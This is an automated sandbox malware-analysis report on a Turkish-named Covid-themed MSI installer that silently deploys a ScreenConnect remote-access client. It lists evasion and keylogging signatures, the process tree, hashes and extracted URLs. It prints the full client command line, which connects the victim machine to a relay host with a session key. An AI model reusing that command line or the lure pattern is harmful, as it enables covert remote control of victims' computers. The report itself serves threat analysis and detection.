Loading ...

Play interactive tourEdit tour

Analysis Report Covid 19 bilgi y#U00f6netim sistemi.msi

Overview

General Information

Sample Name:Covid 19 bilgi y#U00f6netim sistemi.msi
Analysis ID:355327
MD5:1f365aa75ff0d2806a2269d238208593
SHA1:440ef2dfdd778ec159cd6babc60e2b70252d661f
SHA256:3dbe3682f5d3db8cd0d8c0586d3c345a458f274355a4dac2edd05f25092423a8

Most interesting Screenshot:

Detection

ScreenConnect Tool
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

.NET source code references suspicious native API functions
Binary contains a suspicious time stamp
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to log keystrokes (.Net Source)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Startup

  • System is w10x64
  • msiexec.exe (PID: 5888 cmdline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Covid 19 bilgi y#U00f6netim sistemi.msi' MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 1020 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 310E53CA954B87DDF133BB769ED24F52 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • rundll32.exe (PID: 6016 cmdline: rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • msiexec.exe (PID: 4812 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 4286051B5CAEA5BC438DE69C35768ED1 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • msiexec.exe (PID: 5456 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6600E2C3A2980F238FD9D94A5368BBD9 E Global\MSI0000 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • ScreenConnect.ClientService.exe (PID: 5304 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-s6p2r4-relay.screenconnect.com&p=443&s=b49f7b4e-1f8e-4869-a774-7ac73425b6f9&k=BgIAAACkAABSU0ExAAgAAAEAAQAlGYhEPkxKLjcbpwfNZ%2bHR%2fKlTyh8C1eZxhmDq%2baJwQu0VExdNkYfU8P8vD7Y1ZlciHJizNXwnloBDvG1WWJc%2fIrWfX92vykYxqBgUI%2b4K3nOFaRgz3P4iujIXLKmSFuso0Nz%2f9QKAIGQ2FXaFykfYO2dzQQT3wK3Tf0snCYB0oDbSx4YwykdQiz5RcNZfnRkEpx9V%2fjHA1Ojf4Qy2Jy%2beBkU7baqCnkSPedSlHYXKd5Ntlcetv0j6hyn1m4yl%2fFPTTzSAOHcH9OFurBD8INMgbxBWfXp2iwBLbUhbM%2fwW8uAnf93bOrruAeNwCTfZiqQKKfPT0Gmm24qAeUeFxKjR&t=&c=gazete&c=gov.tr&c=tr&c=pc&c=&c=&c=&c=' MD5: F4AFEF1043565F8967F5E8F57B3EEE13)
    • ScreenConnect.WindowsClient.exe (PID: 4316 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '801dc3ab-dc2c-422e-ad1c-65e2ce12fcf0' 'User' MD5: 72D9361CA129593F1F953D42EBD77122)
    • ScreenConnect.WindowsClient.exe (PID: 5072 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '68e7f305-6be0-44b6-9ef1-df08711f43e1' 'System' MD5: 72D9361CA129593F1F953D42EBD77122)
  • svchost.exe (PID: 5560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5600 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4760 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5840 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1968 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3440 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 4084 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1332 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5604 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 3484 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5788 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.471825192.0000000004112000.00000002.00020000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    00000007.00000000.212668661.00000000005B2000.00000002.00020000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      00000006.00000002.457186960.0000000000CF2000.00000002.00020000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000000.00000003.203704441.00000269DBA8D000.00000004.00000001.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000006.00000000.204518995.0000000000CF2000.00000002.00020000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.ScreenConnect.WindowsClient.exe.5b0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              7.0.ScreenConnect.WindowsClient.exe.5b0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                5.2.ScreenConnect.ClientService.exe.4110000.10.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      Compliance:

                      barindex
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.461665462.0000000000E3E000.00000002.00020000.sdmp
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.2.dr
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.2.dr
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: C:\Windows\System32\msiexec.exeFile opened: z:
                      Source: C:\Windows\System32\msiexec.exeFile opened: x:
                      Source: C:\Windows\System32\msiexec.exeFile opened: v:
                      Source: C:\Windows\System32\msiexec.exeFile opened: t:
                      Source: C:\Windows\System32\msiexec.exeFile opened: r:
                      Source: C:\Windows\System32\msiexec.exeFile opened: p:
                      Source: C:\Windows\System32\msiexec.exeFile opened: n:
                      Source: C:\Windows\System32\msiexec.exeFile opened: l:
                      Source: C:\Windows\System32\msiexec.exeFile opened: j:
                      Source: C:\Windows\System32\msiexec.exeFile opened: h:
                      Source: C:\Windows\System32\msiexec.exeFile opened: f:
                      Source: C:\Windows\System32\msiexec.exeFile opened: b:
                      Source: C:\Windows\System32\msiexec.exeFile opened: y:
                      Source: C:\Windows\System32\msiexec.exeFile opened: w:
                      Source: C:\Windows\System32\msiexec.exeFile opened: u:
                      Source: C:\Windows\System32\msiexec.exeFile opened: s:
                      Source: C:\Windows\System32\msiexec.exeFile opened: q:
                      Source: C:\Windows\System32\msiexec.exeFile opened: o:
                      Source: C:\Windows\System32\msiexec.exeFile opened: m:
                      Source: C:\Windows\System32\msiexec.exeFile opened: k:
                      Source: C:\Windows\System32\msiexec.exeFile opened: i:
                      Source: C:\Windows\System32\msiexec.exeFile opened: g:
                      Source: C:\Windows\System32\msiexec.exeFile opened: e:
                      Source: C:\Windows\System32\svchost.exeFile opened: c:
                      Source: C:\Windows\System32\msiexec.exeFile opened: a:
                      Source: unknownDNS traffic detected: queries for: instance-s6p2r4-relay.screenconnect.com
                      Source: svchost.exe, 0000000A.00000002.469151661.000001F8C5C10000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243037142.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://en.wikipedia
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: svchost.exe, 0000000A.00000002.469151661.000001F8C5C10000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: svchost.exe, 0000000A.00000002.469151661.000001F8C5C10000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                      Source: svchost.exe, 0000000A.00000002.468910314.000001F8C5B80000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: ScreenConnect.ClientService.exe, 00000005.00000002.462086274.00000000013A1000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.464165504.0000000002987000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Microsoft.Deployment.WindowsInstaller.dll.2.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                      Source: Microsoft.Deployment.WindowsInstaller.dll.2.drString found in binary or memory: http://wixtoolset.org/news/
                      Source: Microsoft.Deployment.WindowsInstaller.dll.2.drString found in binary or memory: http://wixtoolset.org/releases/
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: svchost.exe, 0000000F.00000002.308821917.0000022453A13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242447973.000000001C6B1000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242370795.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comFBV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242489209.000000001C6B1000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comcomj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242591511.000000001C6B2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comi
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242591511.000000001C6B2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242370795.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.nV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242370795.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.zV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.245560674.000000001C6AE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.245758311.000000001C69B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.249982266.000000001C69A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerse
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.250137731.000000001C6B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comFcnV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.246998651.000000001C69A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comFzV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.245818296.000000001C6AA000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.241463050.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/YV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000003.244105547.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.244222479.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.TTC
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.244222479.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.TTCSV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000003.243744565.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/F
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243826067.000000001C6B2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/FSV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/FTV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.244222479.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/HLj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.244222479.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/XTj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/XTj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243744565.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/j
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000003.243744565.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/F
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/XTj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243826067.000000001C6B2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/j
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.239416728.000000001C6B4000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000003.239355160.000000001C6B4000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.239416728.000000001C6B4000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comrBV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.246683742.000000001C69A000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242306163.000000001C6AF000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnwdthK
                      Source: svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com.
                      Source: svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000F.00000003.308456661.0000022453A5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000F.00000002.308888069.0000022453A3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000F.00000002.308950171.0000022453A4E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000F.00000002.308888069.0000022453A3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000F.00000002.308918837.0000022453A42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000F.00000002.308918837.0000022453A42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000F.00000003.308494934.0000022453A40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000F.00000003.308456661.0000022453A5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.308456661.0000022453A5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.308456661.0000022453A5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000F.00000002.308950171.0000022453A4E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000F.00000002.308888069.0000022453A3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000F.00000003.286707070.0000022453A32000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                      Source: svchost.exe, 0000000F.00000002.308888069.0000022453A3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000F.00000002.308821917.0000022453A13000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.286707070.0000022453A32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.308494934.0000022453A40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.286707070.0000022453A32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.286707070.0000022453A32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000F.00000002.308950171.0000022453A4E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Contains functionality to log keystrokes (.Net Source)Show sources
                      Source: 5.2.ScreenConnect.ClientService.exe.4110000.10.unpack, ScreenConnect/LowLevelKeyboardHooker.cs.Net Code: .ctor
                      Source: 6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/LowLevelKeyboardHooker.cs.Net Code: .ctor
                      Source: 6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/LowLevelKeyboardHooker.cs.Net Code: .ctor
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{460549FD-A8A1-4DCF-B47F-E1FFE52A8670}.SchedServiceConfig.rmiJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_3_04B50440
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3239D
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E378B4
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3B07C
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E39032
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3A811
